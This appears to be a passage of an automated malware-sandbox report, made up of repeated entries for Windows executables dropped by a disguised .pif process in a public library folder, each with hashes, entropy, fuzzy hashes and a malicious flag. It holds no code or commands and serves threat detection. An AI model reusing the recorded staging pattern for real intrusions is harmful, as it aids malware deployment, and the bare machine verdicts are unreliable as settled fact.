                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:4D99934DE66E7A943B13E421E83DEB51
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B7A168DC38B263E4D159F1799FA5DECF6BF753D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:09E1B0A504F290F582BCA5F75AE8C32E0209D79AAA208DD5D3370AD5363949DF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:67032C1E7F237F75A2728542D35A964724AF556B3B8D92C65C8E53CF709F76D080EBEE44F0E5159F088D493A5016BA4EA4E44D9AFAD2C9EB38E1BC607E67891A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0415025190801455
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:3lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:572BA7D2541E74AACF156A1738D6D32D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A20CEB7908F506D37CDC81DF91E447489471EDE1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA0D4DD424CFC7839E096D4B7E4B7D3CCC0C66216BD17B4B6E5CB3112C487AB5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0FF7D1624E215237D0D9C04481F2A0A28011AECCD5C0F503FD92EBC178C33B7C9A4C78AB631C1D184A2E8F1C0F7870F98A78222C18F0A9A7E4F34761A0741B0A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.596686978893825
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:4b+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKeD527BWG:ynPgTHIwZoRBk9DdhSUEVIXgKeVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EE72240F1288D09FB5ACFFD06E5038AB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77CEF3DACC3801AC48D387297A549E2B2AF323DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:91B940DEFFA6A42CB1930798954D7D1F3F2C34C151A6A226228A0545CEF862AE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E014B2B8371800E61518A48D415A4A4840DA1CEE2174B581BF21C3B27E79D1DFA28B44CA248F961FF93D7A45C94BC00B028DDBA79051952BB8B16709DABF7EF7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.281838114277466
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3g5FvCPus6sqjnhMgeiCl7G0nehbGZpbD:wftlDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:41A6345FAB17E9E89725C8E037DE4CFD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BEB095E8176EE0D49DFE3BF782A4BFD83675AD64
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B8A1943701A2448E8D79F20168D8AAE14EFF6179CE56F0AA3E489EBF72EDC404
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D817998116AF1DBF9C9E2CD05FDEDC10A0952F35E391BA56A62279B72A73ABF3291E5BCEF3C8EF4CF5408CEEBA579EE6B9CD694E9F5F6CA5B714FF275674915C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.208932022586297
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ojKTIsAjFuvtIfmFthMaT5U8aChaeu8sqjnhMgeiCl7G0nehbGZpbD:ojIMmPh7TT79tDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6DF873DC47711C5A76A2DC8012AB98DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:370AEF501AB8D40BAA3FAF94C4301EEC01A171E9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A80AC9D7EDC1ED6D23ED327AB650BC7C7F1C9A25793E5D95E3A1E03D3E964C26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:424D52DEEA7800A7E812CE266BB8E49C6DD1399A0827B46B4A1AA1F29C510D987B7B1EA976118DBD80C416BB6302A26253476BC63812BBAE9BF292A4A8D03959
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.411807687236323
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:sGqVwCto1Gm5WgIsqjnhMgeiCl7G0nehbGZpbD:5Z1GmUfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:91BF3C47E3EBDF9E00B4A9CD28B73520
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7D8A102F103B4AC5A04B708D00F569FFDC18AD2D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8988D3227862B5EFAA1C111ACF1B8337AED0F87B401618270DBCE3D5F67CE314
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F89161EF97C7746031C4FF3B4E7F972529242E6F8FE6D1BA8279344915A707C510D32ACBC4F4FDE052F762107105181E242FCDE5E4AD8ED6AA594AA40C1CC98C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.157431696461628
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:sWBWcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:sWBWcsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED94028E194174E15527557784FDA115
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77D35D6C885A12FB4B1F9306F567CBC3B856AEBF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5B6610385ED7DE0ACDB057AC730F53AF55E8D5C1FDECAB1F6208316DCA92203C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A43A5FB32B97FD760ED321DF969A5966B59F646C453E6B58CBEB32918A0B2EC47D6E6E00DEC6E1FC596AFE559E2FCB5E1B22D308EA211411F271FF75426E4A78
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.228523775824454
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:uf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0PsqjnhMgeiCl7G0nehbGZpbD:u+GtCi27mVTyT+a0zDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:28F901D0930EC6F478AB7A9A711A7B73
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DB6F17D79B310B6079185D382F4E6258030B9B89
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7F710F02F195DAE877F1EC5002264D3DEB50CB0B7CB6FF8B0EA91850CE1A6AEA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FF890C9F6E388F81AE704AD0BFBD9E00560984ADDD4DC5F9B1928E107B7441C4114C8B72178CA0A3DCA0CAE6E7BCD82191679D93793E59F5680945B921915C54
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.649686741673421
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:9U198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeY8Dmg27RnWGj:y2NfHOIK5Ns6qR96D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E1787DFB38574AEE81DC7B5191C5BFB1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4917AFD2DEBBE222578EA30E849E6FC47F28E8E3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ABA3E8B5A7AC69DB391DE5C9CB4C7B2DF3A84E2AF751CCEC376EAD8120AC6A46
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51FF58DE6557CD6F5C22D26397E145912B1E7B60E5E60D774562989093238A88354BA53C16CA164EBB07AC0825F7680B225344EFE133830318B4F0777A235EAE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.531950946584056
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:DkcWTUQcydYsqjnhMgeiCl7G0nehbGZpbD:DhKULDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:BE523A69217F0C52253929373529FC9C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3C8BF0C08A464CB8F4BD8C8ADCE0DFF8F57A4DBA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:910C3B1654677DB9E8C7B4CD198B5079CDDB399ACF19E7598F914CEA00D2FE11
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:254B2AECE677F1562F6B291E7A845C5647D81743DA1F2D0881F6DFDB19347F12EA0CE35973E429CE59206011ED8AA9DBD6F40769B2265B470009FCB1644AB4AF
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.352685605231213
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/fY+FUB/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:/A+qB/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E5E8A4D3B80434038F556A01207CEDC0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5417C3022B4E7E2360F775094A5A7344964BE216
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6FC68F7A82D336FE33FFD8052875CEABEBEEC9C5A6A92D841750DA4051113478
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B60E70D07485E50CD69D6F3A949334ECE0E01D7557F48EB73900B028C3055641F4A04F1FA2052927EA5FC42A331275E17D2F9ACAC54A511A37CCF2AEA86C9457
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.022691135028792
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:PXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:59AC573B0AB47617A57250C1FB2BD819
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3643FE706F18184261EA58121FBE45EE6603F54E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:49AA71E56CC269B6FBBA2489111DAAA150191EF2B844B6187FC9A19B34972F7A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:49B34189D57398CA447625CCBD293AA02F3CCD5D796BFB179E454EE2799CB399F4ADF2D1966A1441689830CDC251804EDD6AF97AEA850722BFB92B3A9071CBB6
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.047174545530065
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:5bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:029CD2DD9F78A96FAF3DD5FABE0B9A56
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04FE4892CB73C2C6671914F942D3DBBA282327C2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C122331E0570A91114CAEB4FBE652FF24073F84EDA34ABB2B6B354DF81C4C3AA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D0933E8322414FA396BABE241B66629AF3953010A69EE6E2A8AF9117F74CD1F2088DBE90033CB67A75D449D19DC0AF92908229BFC62E6BF35719ABAB6E12664A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499809129428079
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999367333251777
Encrypted:true
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1230336
Entropy (8bit):5.185621293858276
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1384960
Entropy (8bit):5.377841856961679
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1649152
Entropy (8bit):5.63276540329382
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:wHQJLIRgvsnNOsqjnhMgeiCl7G0nehbGZpbD:wHQJL34iDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:218AB30DE11869925A7A02A5619C700D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CC5EA9915E4ADFD34835D43641CC88300B5F3111
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:93BCE0CDFC3AC6F82A8EDFE798BE146C4EAC06CF0EA4D3BBEAF9394D871342FF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2C58C9BD8D688B23A7D882DDB09360A044FF46AF70A31A3F7EDF4F67B59F3C7BFF00D6ACBF502669DE065845BE5C4180CDEFCAC306F77DD3D3B49BAD2EF8A4D8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.450982988719877
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:bUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kJ:AWmXL6DEC7dRpKuDQbghD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3BF10C4C0F79625E9A3CFE4E77D1815A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:04FEC0F61483017B3A9302D1B40929CE50E7683F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6B4FF51E72630D4E942C055226D1EA0FECCFA4475368C11B8DEE6C5E0282CCE6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B9BB3920B98471CD139D166910F88BE0601A8F5D184188F142BC137F73F369C819254D1177D330F15462F0BBF41E20EB90ED694A43C2F5B04765E0C55D81D426
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9727822629984635
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:frZ23AbsK6Ro022JjL2WEiVqJZuD527BWG:TJADmmxL2WEoCZuVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:79091BE63EA17AF1A4822E59023A59C7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:33D5B8E5DFC5299DE604F38DEEE6C1C2A2D3E2B7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DC33A76B351D74C0FB698F73C9816F6A5C36C274A60717F6AC0B5CB176B356DC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C001805ED7A498AF3A72D48381C6D5BCB01AA2AD24CDF41A3C23B1D1EC28D148537BE298A631EE660490ECCAFDD9073C49829E0C0A339538AC7D3257C41326F2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.20495162518338
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:3frYY42wd7hlOw9fpkEE64XsqjnhMgeiCl7G0nehbGZpbD:uz9xrSrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7408E1C1232C0F0BC4D5C6AA26972C15
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:88D4F985068B3738B69C91918C39105244598B0A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FAEC4452BFED70419AB16D2C52C998C2AFE3297B00D72B0B884B0824A8D7DDAC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BCD606F2BC0E0D77F50BDE63A8D92540F37CCA3503F4A781C8237D3E7C1951D9069AF00D074D8A1161501E46EC25DEACC3207823F8C653D86DCE7D4FBF73D11C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.272973369092675
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:CwkNKiZ+R2GGNUbTF5gXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:CzNKUE5gsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:32AE1F52DA9F9708A9CD61D0B087A5D3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6161EC8960CA439235CAA85220C773F5D8377C78
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:49FFD2FCED49DDE2A3710051498A36601F938D49AECC805CD8350C9946DBE944
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9B460D10DB1F905FD41D2767E2CD4C5670B7BB6904253C6A62BA92D2724C138BB5B9BAD98763FE1CE84374B380344AB24CCD1F14C2A696B2F4C0FB52C179D7C3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.57434686360605
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:vALuzDKnxCp3JKNrPJzruaI6HMaJTtGb9D527BWG:4aGg3cFPIaI6HMaJTtGb9VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D08A6557D0C4528DBC827A8386254A4E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C2DAE11A9BB95BB3B044EE2C86EC2554D10AD35C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B881E1B90610F242FE9A3320627EE36F19F0EB6003AF2407D041200F37D744F6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A10C22CFAA71256BAAD5526A10CCB17AE67EC65F4BA18E397A93D30B90CC0FCC8D51182B009EA20DB20ABE19CA7E482FADE6C46C10A4D8BE2FBC0D3931E31111
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.356088035257598
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:0Xr/SVMxWDsqjnhMgeiCl7G0nehbGZpbD:01xuDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:353B72DAF37C02E1EC5145020F3C50D6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6832F442F3769F1502AD11E80B8B73B921057786
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7995AEEC39D9741620B6BFF90150AD564D06B348D9B241B60A68C5E27BBA14A9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:68B32AEB051F2CFAA4D6AA9BD134B5D98E16BA84AE07781C344092472955FC82E64F4FF47BF2BB3467EE192DBF91285B00A4DF0CE85A533105990A04C7E6F1B2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.248640082863847
